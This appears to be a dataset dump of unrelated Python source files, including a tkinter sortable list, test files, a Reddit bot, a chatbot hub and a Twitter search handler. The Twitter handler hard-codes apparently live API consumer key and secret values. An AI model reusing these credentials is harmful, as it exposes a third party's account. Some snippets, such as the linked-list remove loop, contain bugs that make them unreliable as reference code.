= item_relief\n self._item_padding = item_padding\n self._item_style= item_style\n self._item_width = item_width\n self._item_height = item_height\n \n self._offset_x = offset_x\n self._offset_y = offset_y\n \n self._left = offset_x\n self._top = offset_y\n self._right = self._offset_x + self._item_width\n self._bottom = self._offset_y\n\n self._gap = gap\n\n self._index_of_selected_item = None\n self._index_of_empty_container = None\n\n self._list_of_items = []\n self._position = {}\n\n self._new_y_coord_of_selected_item = None\n\n def create_item(self, value=None, **kwargs):\n \n if self._item_relief is not None:\n kwargs.setdefault(\"relief\", self._item_relief)\n \n if self._item_borderwidth is not None:\n kwargs.setdefault(\"borderwidth\", self._item_borderwidth)\n \n if self._item_style is not None:\n kwargs.setdefault(\"style\", self._item_style)\n \n if self._item_padding is not None:\n kwargs.setdefault(\"padding\", self._item_padding)\n\n item = Item(self.master, value, self._item_width, self._item_height, self._on_item_selected, self._on_item_dragged, self._on_item_dropped, **kwargs) \n return item\n\n def configure_items(self, **kwargs):\n for item in self._list_of_items:\n item.configure(**kwargs)\n\n def add_item(self, item, index=None):\n if index is None:\n index = len(self._list_of_items)\n else:\n if not -len(self._list_of_items) < index < len(self._list_of_items):\n raise ValueError(\"Item index out of range\")\n\n for i in range(index, len(self._list_of_items)):\n _item = self._list_of_items[i]\n _item.move(0, self._item_height + self._gap)\n \n self._position[_item] += 1\n \n x = self._offset_x\n y = self._offset_y + index * (self._item_height + self._gap)\n\n self._list_of_items.insert(index, item)\n self._position[item] = index\n\n item.init(self, x,y)\n\n if len(self._list_of_items) == 1:\n self._bottom += self._item_height\n else:\n self._bottom += self._item_height + self._gap\n \n self.configure(height=self._bottom + self._offset_y)\n\n return item\n\n def delete_item(self, index):\n \n if isinstance(index, Item):\n index = self._position[index]\n else:\n if not -len(self._list_of_items) < index < len(self._list_of_items):\n raise ValueError(\"Item index out of range\")\n\n item = self._list_of_items.pop(index)\n value = item.value\n\n del self._position[item]\n\n item.destroy()\n \n for i in range(index, len(self._list_of_items)):\n _item = self._list_of_items[i]\n _item.move(0, -(self._item_height+self._gap))\n self._position[_item] -= 1\n \n if len(self._list_of_items) == 0:\n self._bottom -= self._item_height\n else:\n self._bottom -= self._item_height + self._gap\n\n self.configure(height=self._bottom + self._offset_y)\n \n return value\n\n del_item = delete_item\n \n def pop(self):\n return self.delete_item(-1)\n \n def shift(self):\n return self.delete_item(0)\n \n def append(self, item):\n self.add_item(item)\n \n def unshift(self, item):\n self.add_item(0, item)\n \n def get_item(self, index):\n return self._list_of_items[index]\n\n def get_value(self, index):\n return self._list_of_items[index].value\n\n def _on_item_selected(self, item): \n self._index_of_selected_item = self._position[item]\n self._index_of_empty_container = self._index_of_selected_item\n\n def _on_item_dragged(self, x, y):\n\n if self._left < x < self._right and self._top < y < self._bottom:\n\n quotient, remainder = divmod(y-self._offset_y, self._item_height + self._gap)\n\n if remainder < self._item_height:\n \n new_container = quotient\n\n if new_container != self._index_of_empty_container:\n if new_container > self._index_of_empty_container:\n for index in range(self._index_of_empty_container+1, new_container+1, 1):\n item = self._get_item_of_virtual_list(index) \n\n item.move(0,-(self._item_height+self._gap))\n else:\n for index in range(self._index_of_empty_container-1, new_container-1, -1):\n item = self._get_item_of_virtual_list(index)\n\n item.move(0,self._item_height+self._gap)\n\n self._index_of_empty_container = new_container\n \n def _get_item_of_virtual_list(self, index):\n if self._index_of_empty_container == index:\n raise Exception(\"No item in index: %s\"%index)\n else:\n if self._index_of_empty_container != self._index_of_selected_item:\n if index > self._index_of_empty_container:\n index -= 1\n\n if index >= self._index_of_selected_item:\n index += 1\n item = self._list_of_items[index]\n return item\n\n def _on_item_dropped(self):\n \n item = self._list_of_items.pop(self._index_of_selected_item)\n self._list_of_items.insert(self._index_of_empty_container, item)\n \n x = self._offset_x\n y = self._offset_y + self._index_of_empty_container *(self._item_height + self._gap)\n \n item.set_position(x,y)\n \n for i in range(min(self._index_of_selected_item, self._index_of_empty_container),max(self._index_of_selected_item, self._index_of_empty_container)+1):\n item = self._list_of_items[i]\n self._position[item] = i\n \n self._index_of_empty_container = None\n self._index_of_selected_item = None\n\nif __name__ == \"__main__\":\n try:\n from Tkinter import Tk, IntVar\n from ttk import Label, Frame, Entry, Button, Style\n import tkMessageBox as messagebox\n from Tkconstants import *\n except ImportError:\n from tkinter import Tk, IntVar, messagebox\n from tkinter.ttk import Label, Frame, Entry, Button, Style\n from tkinter.constants import *\n\n root = Tk()\n root.title(\"DDList example\")\n root.geometry(\"%dx%d%+d%+d\"%(640, 550, 0, 0))\n \n Style().configure(\"Item.DDList.TFrame\", relief=RAISED)\n\n sortable_list = DDList(root, 200, 100, offset_x=10, offset_y=10, gap =10, item_borderwidth=1, item_relief=\"groove\")\n sortable_list.pack(expand=True, fill=BOTH)\n \n for i in range(4):\n item = sortable_list.create_item(value=i)\n label = Label(item, text=\"this is a label %s\"%i)\n label.pack(anchor=W, padx= (4,0), pady= (4,0))\n\n sortable_list.add_item(item)\n\n frame = Frame(root)\n frame.pack(fill=X, pady=(0, 10))\n \n indexVar = IntVar()\n label = Label(frame, text=\"Entry index of item to delete:\")\n label.pack(side=LEFT, padx=(10,6))\n entry_of_index = Entry(frame,textvariable= indexVar, width=3)\n \n def delete_item():\n try:\n index = indexVar.get()\n except ValueError:\n messagebox.showerror(\"Error\", \"Not a valid integer\")\n return\n\n entry_of_index.delete(0, END)\n sortable_list.delete_item(index)\n entry_of_index.bind('', delete_item)\n\n entry_of_index.pack(side=LEFT)\n \n Button(frame, text=\"Delete\", command=delete_item).pack(side=LEFT, padx=(3,0))\n\n root.mainloop()\n","sub_path":"recipes/Python/580717_Sortable_megawidget_tkinter_like_sortable/recipe-580717.py","file_name":"recipe-580717.py","file_ext":"py","file_size_in_byte":11376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9012103","text":"# -*- coding: utf-8 -*-\nimport allure\n\nfrom model.group import Group\n\n\ndef test_add_group(app, db, json_groups, check_ui):\n group = json_groups\n with allure.step('Get group list from DB'):\n old_groups = db.get_group_list()\n with allure.step('Create group %s' % group):\n app.group.create(group)\n with allure.step('Verify group was added'):\n new_groups = db.get_group_list()\n old_groups.append(group)\n assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)\n if check_ui:\n assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","sub_path":"test/test_add_group.py","file_name":"test_add_group.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541851003","text":"import cv2\n\n\nclass InputFeeder:\n def __init__(self, input_type, input_file=None):\n '''\n input_type: str, The type of input. Can be 'video' for video file, 'image' for image file,\n or 'cam' to use webcam feed.\n input_file: str, The file that contains the input image or video file. Leave empty for cam input_type.\n '''\n self.input_type = input_type\n if input_type == 'video' or input_type == 'image':\n self.input_file = input_file\n\n def load_data(self):\n if self.input_type == 'video':\n self.cap=cv2.VideoCapture(self.input_file)\n elif self.input_type == 'cam':\n self.cap = cv2.VideoCapture(0)\n else:\n self.cap = cv2.imread(self.input_file)\n if not self.cap.isOpened():\n exit(0)\n\n def next_batch(self):\n '''\n Returns the next image from either a video file or webcam.\n If input_type is 'image', then it returns the same image.\n '''\n while True:\n flag, frame = self.cap.read()\n if not flag:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n yield flag, frame\n\n def calculate_fps(self):\n '''\n finds frames per second\n '''\n return int(self.cap.get(cv2.CAP_PROP_FPS))\n\n def release(self):\n '''\n Closes the VideoCapture.\n '''\n if not self.input_type=='image':\n self.cap.release()\n pass","sub_path":"src/Input_feeder.py","file_name":"Input_feeder.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391909589","text":"i_min = 0\r\ni = 5\r\ni_max = 10\r\nwhile i>i_min and i 0:\n v = queue.pop()\n if v == v_tesoro:\n return v\n for suc in lab.succs(v):\n if suc not in seen:\n seen.add(suc)\n queue.push(suc)\n\n\ndef recorredor_vertices_anchura(lab, v_inicial):\n vertices = []\n queue = Fifo()\n seen = set()\n queue.push(v_inicial)\n seen.add(v_inicial)\n while len(queue) > 0:\n v = queue.pop()\n vertices.append(v)\n for suc in lab.succs(v):\n if suc not in seen:\n seen.add(suc)\n queue.push(suc)\n return vertices\n\n\ndef recorredor_aristas_anchura(lab, v_inicial):\n aristas = []\n queue = Fifo()\n seen = set()\n queue.push((v_inicial, v_inicial))\n seen.add(v_inicial)\n while len(queue) > 0:\n u, v = queue.pop()\n aristas.append((u, v))\n for suc in lab.succs(v):\n if suc not in seen:\n seen.add(suc)\n queue.push((v, suc))\n return aristas\n\n\ndef busca_tesoro_profundidad(lab, v_inicial):\n def explorar_desde(v):\n seen.add(v)\n if v == v_tesoro: #Recorrido en Pre-orden\n return v #\n for suc in lab.succs(v):\n res = explorar_desde(suc)\n if res is not None:\n return res\n #if v == v_tesoro: #Recorrido en Post-Orden\n # return v #\n seen = set()\n return explorar_desde(v_inicial)\n\n\ndef recorredor_vertices_profundidad(lab, v_inicial):\n def explorar_desde(v):\n seen.add(v)\n vertices.append(v) #Preorden\n for suc in lab.succs(v):\n if suc not in seen:\n explorar_desde(suc)\n #vertices.append(v) #Recorrido en Post-Orden\n vertices = []\n seen = set()\n explorar_desde(v_inicial)\n return vertices\n\n\ndef recorredor_aristas_profundidad(lab, v_inicial):\n def explorar_desde(u, v):\n seen.add(v)\n aristas.append((u, v)) #Preorden\n for suc in lab.succs(v):\n if suc not in seen:\n explorar_desde(v, suc)\n #vertices.append(u, v) #Recorrido en Post-Orden\n aristas = []\n seen = set()\n explorar_desde(v_inicial, v_inicial)\n return aristas\n\n\ndef recuperador_camino(lista_aristas, v):\n \"\"\"bp = {}\n for orig, dest in lista_aristas:\n bp[dest] = orig\n \"\"\"\n bp = dict((dest, orig) for orig, dest in lista_aristas)\n\n camino = [v]\n while v is not bp[v]:\n v = bp[v]\n camino.append(v)\n\n camino.reverse()\n return camino\n\n\npasillos = [((0,0),(0,1)), ((0,2),(0,3)), ((1,0),(1,1)), ((1,1),(1,2)), ((2,0),(2,1)), ((2,1),(2,2)), ((2,2),(2,3)), ((0,1),(1,1)),((0,2),(1,2)), ((0,3),(1,3)), ((1,1),(2,1)), ((1,2),(2,2))]\n\nlaberinto = UndirectedGraph(E=pasillos)\n\nv_inicio = (0, 0)\nv_tesoro = (1, 3)\n\n#pos_tesoro_encontrada = busca_tesoro_anchura(laberinto, v_inicio)\nlista_aristas = recorredor_aristas_anchura(laberinto, v_inicio)\ncamino_corto = recuperador_camino(lista_aristas, v_tesoro)\n\n\"\"\"if pos_tesoro_encontrada is None:\n print(\"Tesoro no encontrado\")\nelse:\n print(\"Tesoro encontrado en la habitación {0}\".format(pos_tesoro_encontrada))\n\"\"\"\nprint(camino_corto)\n\n\n","sub_path":"Teoria/clase23sep.py","file_name":"clase23sep.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309297064","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 -*-\n\"\"\"Test desiutil.plots.\n\"\"\"\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\n# The line above will help with 2to3 support.\nimport unittest\nimport os\nimport numpy as np\n\n# Set non-interactive backend for Travis\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nfrom ..plots import plot_slices\nfrom ..plots import plot_sky\n\ntry:\n basestring\nexcept NameError: # For Python 3\n basestring = str\n\n\nclass TestPlots(unittest.TestCase):\n \"\"\"Test desiutil.plots\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.plot_file = 'test.png'\n cls.plot_file2 = 'test_sky.png'\n @classmethod\n def tearDownClass(cls):\n if os.path.exists(cls.plot_file):\n os.remove(cls.plot_file)\n\n def test_slices(self):\n \"\"\"Test plot_slices\n \"\"\"\n # Random data\n x = np.random.rand(10000)\n y = np.random.randn(10000)\n # Run\n ax = plot_slices(x,y,0.,1.,0.)\n ax.set_ylabel('N sigma')\n ax.set_xlabel('x')\n plt.savefig(self.plot_file)\n def test_plotsky(self):\n \"\"\"Test plot_sky\n \"\"\"\n import astropy.units as u\n x = 360*np.random.rand(100)*u.degree\n y = 360*np.random.rand(100)*u.degree\n plot_sky(x,y,discrete_colors=False)\n plt.savefig(self.plot_file2)\n\ndef test_suite():\n \"\"\"Allows testing of only this module with the command::\n\n python setup.py test -m \n \"\"\"\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","sub_path":"py/desiutil/test/test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512278578","text":"#!/usr/bin/env python\n#coding:utf-8\n# Author: mozman\n# Purpose: bruteforce algorithms\n# Created: 02.04.2010\n# License: MIT License\n\nfrom random import random\nfrom geoalg import Line2D\n\ndef closest_pair(points):\n _closest_pair = (points[0], points[1])\n points_count = len(points)\n min_so_far = _dist(points[0], points[1])\n for index1 in range(points_count-1):\n point1 = points[index1]\n for index2 in range(index1+1, points_count):\n point2 = points[index2]\n distance = _dist(point1, point2)\n if distance < min_so_far:\n min_so_far = distance\n _closest_pair = (point1, point2)\n return _closest_pair\n\ndef _dist(p1, p2):\n return ((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)**0.5\n\ndef intersection_points(lines):\n \"\"\"Brute force algorithm to find all intersections points of .\n lines -- list of points tuples [(s1, e1), (s2, e2), ...]\n where s1, e1, s2, ... are xy-tuples like (10.4, 5,7)\n\n z-axis will be ignored.\n \"\"\"\n intersection_points = []\n lines = list(lines)\n line_count = len(lines)\n for index1 in range(line_count):\n start, end = lines[index1]\n line1 = Line2D(start, end)\n for index2 in range(index1+1, line_count):\n start, end = lines[index2]\n point = line1.intersect(Line2D(start, end))\n if point:\n intersection_points.append(point)\n return intersection_points\n\n\ndef random_points(count, xdim=1000., ydim=1000.):\n xhalf = xdim / 2.\n yhalf = ydim / 2.\n return ((random() * xdim - xhalf , random() * ydim - yhalf) for _ in range(count))\n\n\ndef round_points(points, prec=6):\n return ((round(point[0], prec), round(point[1], prec)) for point in points)\n\n\ndef equal_lists(list1, list2, prec=6):\n set1 = set(round_points(list1, prec))\n set2 = set(round_points(list2, prec))\n if len(list1) != len(list2):\n return False\n return set1 == set2","sub_path":"geoalg/bruteforce.py","file_name":"bruteforce.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"482707039","text":"class Node(object):\n\n def __init__(self, item, next = None):\n self.data = item\n self.next = next\n\n def getData(self):\n return self.data\n\n def getNext(self):\n return self.next\n \n def setData(self, item):\n self.data = item\n \n def setNext(self, node):\n self.next = node\n\n\nclass Link_list(object):\n\n def __init__(self):\n self.head = None\n\n def isEmpty(self):\n return self.head == None\n\n def add(self, data):\n node = Node(data, self.head)\n self.head = node\n \n def append(self, data):\n node = Node(data)\n cur = self.head\n if cur is None:\n self.head = node\n else:\n while cur.next is not None:\n cur = cur.next\n cur.next = node\n\n def travel(self):\n cur = self.head\n while cur is not None:\n print(cur.data,end=\" \")\n cur = cur.getNext()\n print()\n \n def size(self):\n cur = self.head\n count = 0\n while cur is not None:\n count += 1\n cur = cur.getNext()\n return count\n \n def search(self, item):\n cur = self.head\n while cur is not None:\n if cur.getData() == item:\n return True\n cur = cur.getNext()\n return False\n\n def remove(self, item):\n cur = self.head\n if cur.getData() == item:\n self.head = cur.getNext()\n else:\n while cur.getNext() is not None:\n if cur.getNext().getData() == item:\n cur.setNext(cur.getNext().getNext())\n break\n \n def pop(self, pos):\n cur = self.head\n if pos == 0:\n temp = self.head.getData()\n self.head = self.head.getNext()\n return temp\n else:\n cur = self.head\n count = 1\n while cur.getNext() is not None and count != pos:\n cur = cur.getNext()\n count += 1\n temp = cur.next.getData()\n cur.setNext(cur.getNext().getNext())\n return temp\n\n def insert(self, pos, item):\n if pos == 0:\n self.add(item)\n else:\n node = Node(item)\n count = 0\n cur = self.head\n while count + 1 < pos and cur.getNext() is not None:\n cur = cur.getNext()\n count += 1\n node.setNext(cur.next)\n cur.setNext(node)\n\n\na = Link_list()\nfor i in range(10):\n a.append(i)\na.travel()\nprint(a.size())\na.remove(1)\na.add(10)\nprint(a.size())\na.remove(0)\na.travel()\nprint(a.pop(0),\"this is a pop method\")\na.travel()\na.insert(0, 8)\na.travel()\na.insert(3, 12)\na.travel()\na.insert(a.size()-1, 666)\na.insert(a.size()+20, 786)\na.travel()\na.remove(8)\na.insert(2,8)\na.insert(5,8)\na.travel()\nprint(a.search(8))\nprint(a.search(1))","sub_path":"PKU-Python-DAC/顺序结构/link_list.py","file_name":"link_list.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"535717436","text":"import re\n\n'''\nPython tries to match the longest possible\nstring that matches the pattern provided\n'''\n# regular expressions in Python do greedy matches\n# here it matches the first five characters\ndigit_regex = re.compile(r'(\\d){3,5}')\nmatch_object = digit_regex.search('1234567890')\nprint(match_object.group())\n\n'''\nTo do a non-greedy match, include\na question mark after the curly braces\n'''\n# matches the smallest possible string\ndigit_regex = re.compile(r'(\\d){3,5}?')\nmatch_object = digit_regex.search('1234567890')\nprint(match_object.group())\n","sub_path":"regular-expressions/repetitions_regex_5.py","file_name":"repetitions_regex_5.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"353893638","text":"import re\r\nimport sys\r\nimport praw\r\nfrom HelperObjects import Predicate,Display,log\r\n\r\n# Properties\r\nTITLE_LIMIT=100\r\n\r\ndef get_subreddits(predicatelist):\r\n subreddits = []\r\n for user in predicatelist:\r\n for predicate in user.predicates:\r\n if predicate.subreddit not in subreddits:\r\n subreddits.append(predicate.subreddit)\r\n log('Requesting again subreddits: {subs}'.format(subs=subreddits))\r\n return subreddits\r\n\r\n# fetch updates from Reddit\r\ndef fetchposts(subs, predicatelist):\r\n reddit = praw.Reddit('subreddit_deals_bot')\r\n for submission in reddit.subreddit('+'.join(subs)).stream.submissions():\r\n log('Received submission: {sub}:{title}'.format(sub=submission.subreddit.display_name,title=submission.title))\r\n for username in Predicate.get_matched_usernames(submission,predicatelist):\r\n # Package list into readable,formatted text\r\n display = Display(submission)\r\n log('Added display text=[{display}]'.format(display=display.tostring()))\r\n # Notify Users\r\n reddit.redditor(username).message(display.title[:TITLE_LIMIT], display.tostring())\r\n\r\n\r\n# Running as script\r\ndef main():\r\n jsonfile = r'data_test.json'\r\n predicatelist = Predicate.init_from_json(jsonfile)\r\n fetchposts(get_subreddits(predicatelist), predicatelist)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"FetchUpdates.py","file_name":"FetchUpdates.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346712709","text":"# -*- coding: utf-8 -*-\r\n# File: general_hub_1.py\r\n# Author: Hualong Zhang \r\n# CreateDate: 19-03-09\r\nimport os\r\nimport sys\r\n# 模块路径引用统一回退到Libbot目录下\r\nproject_path = os.path.abspath(os.path.join(os.getcwd(), \"../..\"))\r\nsys.path.append(project_path)\r\n\r\nimport model.config.multiwheel_manage as multiwheelUnit\r\nfrom model.question.entity_match import entityMatch\r\nfrom model.question.entity_match2 import entityMatch2\r\nfrom model.grapg_QA.json_bot import jsonBot\r\nfrom model.grapg_QA.rdf_bot import rdfBot\r\nfrom model.grapg_QA.rdf_bot_multiwheel import rdfBotMul\r\nfrom model import aiml_cn\r\nfrom model.kb_prepare.rdf_prepare import rdfPrepare\r\nimport numpy as np\r\nimport time\r\n\r\n\r\n\r\nclass GeneralHub():\r\n \"\"\"\r\n 总控程序版本1\r\n \"\"\"\r\n def __init__(self):\r\n multiwheelUnit._init()\r\n multiwheelUnit.set_value('userid', 1)\r\n self._aiml_kernal = aiml_cn.Kernel()\r\n self._aiml_kernal.learn('../../resource/template.aiml')\r\n self._aiml_kernal.learn('../../resource/contain_template.aiml')\r\n self._aiml_kernal.learn('../../resource/multiwheelQA.aiml')\r\n self._aiml_kernal.learn('../../resource/time_template.aiml')\r\n def question_answer_hub(self, question_str):\r\n \"\"\"\r\n 问答总控,基于aiml构建问题匹配器\r\n :param question_str:问句输入\r\n :return:\r\n \"\"\"\r\n g = rdfPrepare.load_graph()\r\n question_replaced, entity_dict = entityMatch2.match_and_replace_all(question_str,g)\r\n #print(question_replaced,entity_dict)\r\n\r\n navi_g = rdfPrepare.load_navi_graph()\r\n navi_question_replaced, navi_entity_dict = entityMatch2.match_and_replace_all(question_str, navi_g)\r\n #print(navi_question_replaced, navi_entity_dict)\r\n # question_replaced, entity_dict = entityMatch.match_and_replace_all(question_str)\r\n '''\r\n arr = []\r\n if len(entity_dict['room']) > 0:\r\n for i in entity_dict['room']:\r\n if len(i) == 0:\r\n continue\r\n index = question_str.find(i[0])\r\n arr.append(index)\r\n # print(arr)\r\n arr_index = np.argsort(np.array(arr))\r\n # print(arr_index)\r\n entity_dict2 = []\r\n for i in entity_dict['room']:\r\n if len(i) == 0:\r\n continue\r\n entity_dict2.append(i)\r\n\r\n for i in range(len(entity_dict['room'])):\r\n if len(entity_dict['room'][i]) == 0:\r\n continue\r\n # print(arr_index[i],entity_dict2[arr_index[i]])\r\n entity_dict['room'][i] = entity_dict2[arr_index[i]]\r\n '''\r\n if multiwheelUnit.get_value('business') == \"办理读书卡\":\r\n if \"answer\" not in multiwheelUnit.get_value('step'):\r\n question_replaced += \"读卡\"\r\n else:\r\n multiwheelUnit.set_value('business',None)\r\n multiwheelUnit.set_value('step', None)\r\n\r\n aiml_respons = self._aiml_kernal.respond(question_replaced)\r\n\r\n if 'multiwheeltask_'in aiml_respons:\r\n print(\"aiml_respons: \", str(aiml_respons))\r\n # print(\"entity_dict: \", str(entity_dict))\r\n graph_respons = rdfBotMul.task_response(aiml_respons, entity_dict, question_str, g)\r\n return graph_respons\r\n elif 'task_' in aiml_respons:\r\n print(\"aiml_respons: \", str(aiml_respons))\r\n #print(\"entity_dict: \", str(entity_dict))\r\n if aiml_respons == 'task_room_pos':\r\n graph_respons = rdfBot.task_response(aiml_respons, navi_entity_dict, question_str, navi_g)\r\n else:\r\n graph_respons = rdfBot.task_response(aiml_respons,entity_dict,question_str,g)\r\n\r\n return graph_respons\r\n else:\r\n return aiml_respons\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n gh = GeneralHub()\r\n # gh.question_answer_hub('少年儿童馆主题活动区电话啥啊?')\r\n # gh.question_answer_hub('少年儿童馆在哪啊?')\r\n # gh.question_answer_hub('少年儿童馆主题活动区电话啥啊?')\r\n # gh.question_answer_hub('会议论文在哪?')\r\n # gh.question_answer_hub('学位论文在哪?')\r\n # gh.question_answer_hub('香港书在哪个馆啊?')\r\n #gh.question_answer_hub('古籍馆什么时候开?')\r\n test_hub = GeneralHub()\r\n while True:\r\n question_str = input('User:')\r\n if question_str == 'exit':\r\n break\r\n else:\r\n print('Libot:', test_hub.question_answer_hub(question_str))\r\n\r\n\r\n\r\n\r\n","sub_path":"backend/model/robot_hub/general_hub_1.py","file_name":"general_hub_1.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"172694988","text":"__author__ = 'zdj'\nclass Evaluator:\n def __init__(self, result_path, test_path):\n self.result_path = result_path\n self.test_path = test_path\n self.result_token_list = []\n self.test_token_list = []\n self.match_num = 0\n\n def get_token_list(self, path, token_list):\n file = open(path)\n r_list = file.readlines()\n file.close()\n for r in r_list:\n tokens = r.split()\n token_list.__iadd__(tokens)\n\n def get_match_number(self):\n test_l = 0\n result_l = 0\n i = 0\n j = 0\n match_num = 0\n while True:\n if i >= len(self.test_token_list) or j >= len(self.result_token_list):\n break\n if test_l == result_l:\n if self.result_token_list[j] == self. result_token_list:\n self.match_num += 1\n test_l += len(self.test_token_list[i])\n result_l += len(self.result_token_list[j])\n i += 1\n j += 1\n\n elif test_l > result_l:\n result_l += len(self.result_token_list[j])\n j += 1\n elif result_l > test_l:\n test_l += len(self.test_token_list[i])\n i += 1\n return self.match_num\n\n def get_recall_rate(self):\n rate = (float)(self.match_num) / (float)(len(self.test_token_list))\n return rate\n\n def get_precision_rate(self):\n rate = (float)(self.match_num) / (float)(len(self.test_token_list))\n return rate\n\nif __name__ == \"__main__\":\n e_tor = Evaluator()","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"525638250","text":"from twython import Twython\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponseRedirect, HttpResponse\nimport TwitReaper.views\nfrom models import User,Twit\nimport circles\n\nimport requests\nCUSTOMER_KEY = 'QhlraziZ4px2EYecH8VfHRi3J'\nCUSTOMER_SECRET = 'MpHKZs179UN8rRuHBB591aU0X6A8WtVW6KFPK20gBk4RE9Nszb'\n\n\ndef twSearch(target, oauth_verifier, token, secret):\n # twitter = Twython( APP_KEY, APP_SECRET)\n # auth = twitter.get_authentication_tokens(callback_url='http://81.174.167.24/tr/verify')\n # OAUTH_TOKEN = auth['oauth_token']\n # OAUTH_SECRET = auth['oauth_token_secret']\n # HttpResponseRedirect(auth['auth_url'])\n\n # oauth_verifier = r['oauth_verifier']\n\n # oauth_verifier = r.text\n global CUSTOMER_KEY\n global CUSTOMER_SECRET\n\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET,\n token, secret)\n\n final_step = twitter.get_authorized_tokens(oauth_verifier)\n\n OAUTH_TOKEN = final_step['oauth_token']\n OAUTH_SECRET = final_step['oauth_token_secret']\n name = final_step['screen_name']\n twid = final_step['user_id']\n\n allusers = list(User.objects.values())\n\n user = User.objects.create(name=str(name), twid=twid, token=OAUTH_TOKEN, secret=OAUTH_SECRET)\n\n # user.save()\n\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET,\n OAUTH_TOKEN, OAUTH_SECRET)\n\n # ACCESS_TOKEN = twitter.obtain_access_token()\n # twitter = Twython( APP_KEY, access_token=ACCESS_TOKEN)\n result = {'user': user, 'results': twitter.search_users(q=target) }\n return result\n\ndef user_login(name=None):\n # user = None\n # if name is None:\n # user = User(name=name, token=None, secret=None)\n # else:\n\n user = User.objects.get(name=name)\n\n if user.token is None:\n return False\n else:\n return True\n\ndef buildCircle(targetid, name):\n # try:\n user = User.objects.get(name=name)\n twitter = getTwitter(user)\n success = False\n\n try:\n twit = Twit.objects.get(twid=targetid)\n # if not twit.done:\n success = circles.builder(twit, user )\n twit = Twit.objects.get(twid=targetid)\n return twit.report_id\n # else:\n #\n except:\n target = twitter.show_user(user_id=targetid)\n twit = Twit.objects.create(twid=str(targetid), name=target['screen_name'])\n success = circles.builder(twit, user)\n twit = Twit.objects.get(twid=targetid)\n return twit.report_id\n # except:\n # success = False\n\n # return success\n\n\ndef getTwitter(user):\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET, user.token, user.secret)\n return twitter\n\n\ndef twSearch2(target, user):\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET,\n user.token, user.secret)\n\n # ACCESS_TOKEN = twitter.obtain_access_token()\n # twitter = Twython( APP_KEY, access_token=ACCESS_TOKEN)\n result = {'user': user, 'results': twitter.search_users(q=target) }\n return result","sub_path":"TwitReaper/twithandler.py","file_name":"twithandler.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"276426772","text":"import pandas as pd\nimport warnings\nimport glob\nimport numpy as np\nfrom tqdm import tqdm\nfrom record import *\n\n\ndef load_all_arrythmia(filepath):\n arrythmia_list = pd.read_csv('../../arrythmia/hf_round1_arrythmia.txt',header=None,sep=\"\\t\",encoding='utf-8')\n arrythmia_id2t = {}\n arrythmia_t2id = {}\n for i in range(len(arrythmia_list)):\n arrythmia_id2t[i]=arrythmia_list[i]\n arrythmia_t2id[arrythmia_list[i]] = i\n return arrythmia_id2t, arrythmia_t2id\n\n\ndef load_all_df(filepath, data_dir):\n df = pd.read_csv(filepath, sep=\"\\t\", names=list(range(0, 12)))\n df.columns = ['data_file', 'age', 'gender', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11']\n record_list = []\n for item_idx in df.index:\n item = df.loc[item_idx]\n label_list = df.loc[item_idx][3:-1]\n record = Record(data_dir=data_dir, datafile=item['data_file'], age=item['age'], gender=item['gender'], label_list=label_list)\n record_list.append(record)\n return record_list\n # df.columns = ['id','age','gender','f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10','f11']\n\n\nif __name__ == '__main__':\n record_list = load_all_df('/home/jiangli/data_tc/hefei_data/label/hf_round1_label.txt', '/home/jiangli/data_tc/hefei_data/train/train')\n\n","sub_path":"hefei_xindiantu/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131825667","text":"#Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def mergeTwoLists(self, l1: 